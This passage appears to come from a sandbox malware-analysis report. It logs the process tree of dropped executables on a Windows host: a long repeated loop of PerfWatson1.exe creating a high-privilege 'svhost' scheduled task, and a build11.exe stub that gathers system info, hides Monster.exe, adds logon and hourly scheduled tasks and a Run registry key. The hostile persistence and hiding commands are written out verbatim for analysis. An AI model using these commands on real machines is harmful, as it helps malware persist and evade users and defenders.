        Runs ping.exe
        
        PID:2156
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        164⤵
        
        PID:240
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        165⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QrUEsH0T39rs.bat" "
        165⤵
        
        PID:988
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        166⤵
        
        PID:4980
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        166⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5016
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        166⤵
        
        PID:4528
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        167⤵
        
        PID:1532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\W13JHBJ2rYvd.bat" "
        167⤵
        
        PID:2360
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        168⤵
        
        PID:3180
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        168⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2836
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        168⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4092
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        169⤵
        
        PID:4240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ibSdvkPJDENX.bat" "
        169⤵
        
        PID:4928
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        170⤵
        
        PID:3420
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        170⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2672
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        170⤵
        
        PID:856
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        171⤵
        
        PID:4284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rn6eFfHf11fk.bat" "
        171⤵
        
        PID:3112
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        172⤵
        
        PID:4724
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        172⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1800
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        172⤵
        
        PID:1244
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        173⤵
        
        PID:2900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5I5rO2RFPSVm.bat" "
        173⤵
        
        PID:2952
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        174⤵
        
        PID:4484
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        174⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1368
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        174⤵
        
        PID:1820
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        175⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LNKjWBcil6ZF.bat" "
        175⤵
        
        PID:1012
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        176⤵
        
        PID:3944
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        176⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3856
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        176⤵
        
        PID:2496
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        177⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3E1ZHSPPqiIp.bat" "
        177⤵
        
        PID:1284
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        178⤵
        
        PID:3596
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        178⤵
        
        PID:3920
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        178⤵
        
        PID:792
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        179⤵
        
        PID:2112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ilY1Zc1P5Vmt.bat" "
        179⤵
        
        PID:2916
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        180⤵
        
        PID:1300
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        180⤵
        Runs ping.exe
        
        PID:3004
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        180⤵
        
        PID:916
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        181⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rJDqAp9vySsW.bat" "
        181⤵
        
        PID:2500
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        182⤵
        
        PID:4800
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        182⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4660
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        182⤵
        
        PID:3476
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        183⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kYWV89qnJkUD.bat" "
        183⤵
        
        PID:2008
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        184⤵
        
        PID:4220
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        184⤵
        
        PID:3560
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        184⤵
        
        PID:3988
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        185⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3Fo20fTK85ag.bat" "
        185⤵
        
        PID:4992
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        186⤵
        
        PID:608
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        186⤵
        Runs ping.exe
        
        PID:4708
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        186⤵
        
        PID:1956
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        187⤵
        
        PID:344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lrXyDBNHmtdJ.bat" "
        187⤵
        
        PID:4084
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        188⤵
        
        PID:1636
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        188⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4916
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        188⤵
        
        PID:1408
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        189⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\R1z0ZmsYGalf.bat" "
        189⤵
        
        PID:3888
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        190⤵
        
        PID:1996
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        190⤵
        Runs ping.exe
        
        PID:3608
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        190⤵
        
        PID:1816
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        191⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9C1iIDtQYD4v.bat" "
        191⤵
        
        PID:3828
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        192⤵
        
        PID:2164
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        192⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:176
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        192⤵
        
        PID:3920
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        193⤵
        
        PID:1284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hrGDg1AdV9OK.bat" "
        193⤵
        
        PID:4492
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        194⤵
        
        PID:3076
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        194⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3024
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        194⤵
        
        PID:5104
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        195⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yGtTBl8IDJUr.bat" "
        195⤵
        
        PID:736
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        196⤵
        
        PID:1572
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        196⤵
        Runs ping.exe
        
        PID:3528
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        196⤵
        
        PID:4088
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        197⤵
        
        PID:2716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CVu3plBkcgHb.bat" "
        197⤵
        
        PID:3536
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        198⤵
        
        PID:3844
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        198⤵
        Runs ping.exe
        
        PID:4972
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        198⤵
        
        PID:2168
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        199⤵
        
        PID:944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y8jXTGhQlJpU.bat" "
        199⤵
        
        PID:4928
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        200⤵
        
        PID:1536
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        200⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        200⤵
        
        PID:4992
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        201⤵
        
        PID:332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UvyiVeU9Xidk.bat" "
        201⤵
        
        PID:1228
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        202⤵
        
        PID:3152
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        202⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3312
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        202⤵
        
        PID:1372
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        203⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6qS3egQJCJ3X.bat" "
        203⤵
        
        PID:2896
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        204⤵
        
        PID:2380
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        204⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:968
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        204⤵
        
        PID:3300
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        205⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7AMwXN8qVRSg.bat" "
        205⤵
        
        PID:700
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        206⤵
        
        PID:1500
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        206⤵
        Runs ping.exe
        
        PID:3596
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        206⤵
        
        PID:4836
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        207⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B9TTrNhRDSJK.bat" "
        207⤵
        
        PID:3116
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        208⤵
        
        PID:1216
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        208⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1784
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        208⤵
        
        PID:2792
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        209⤵
        
        PID:1100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HMwUzAzaUBqi.bat" "
        209⤵
        
        PID:2916
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        210⤵
        
        PID:3880
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        210⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:788
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        210⤵
        
        PID:736
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        211⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\On7ul4K2gaSD.bat" "
        211⤵
        
        PID:3192
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        212⤵
        
        PID:4116
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        212⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        212⤵
        
        PID:4240
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        213⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1A50sMzEIYcK.bat" "
        213⤵
        
        PID:3484
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        214⤵
        
        PID:1536
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        214⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2912
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        214⤵
        
        PID:428
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        215⤵
        
        PID:2284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y2koCnyRPM4L.bat" "
        215⤵
        
        PID:3100
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        216⤵
        
        PID:1960
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        216⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5092
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        216⤵
        
        PID:1228
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        217⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xopopnT7TTnk.bat" "
        217⤵
        
        PID:3440
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        218⤵
        
        PID:1696
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        218⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2244
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        218⤵
        
        PID:2420
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        219⤵
        
        PID:4760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V7NP7dTNHOqD.bat" "
        219⤵
        
        PID:3900
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        220⤵
        
        PID:2496
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        220⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2156
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        220⤵
        
        PID:3784
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        221⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yxCSlMxH5Npq.bat" "
        221⤵
        
        PID:2748
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        222⤵
        
        PID:3004
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        222⤵
        Runs ping.exe
        
        PID:5016
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        222⤵
        
        PID:1000
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        223⤵
        
        PID:1384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Cua0FrzFmDSE.bat" "
        223⤵
        
        PID:1440
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        224⤵
        
        PID:4788
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        224⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:492
- - C:\Users\Admin\Desktop\Files\twztl.exe
    "C:\Users\Admin\Desktop\Files\twztl.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1868
- - C:\Users\Admin\Desktop\Files\build11.exe
    "C:\Users\Admin\Desktop\Files\build11.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2992
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2992_133772965421700862\stub.exe
      C:\Users\Admin\Desktop\Files\build11.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:4824
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:492
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:3988
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:1580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:4644
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:2904
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        5⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:1444
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        6⤵
        Views/modifies file attributes
        
        PID:3144
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "schtasks /query /TN "MonsterUpdateService""
        5⤵
        
        PID:2108
      - C:\Windows\system32\schtasks.exe
        
        schtasks /query /TN "MonsterUpdateService"
        6⤵
        
        PID:2988
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        5⤵
        
        PID:2312
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4948
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        5⤵
        
        PID:4664
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f"
        5⤵
        
        PID:1992
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f
        6⤵
        Adds Run key to start application
        
        PID:4016
    - - C:\Windows\system32\cmd.exe
        
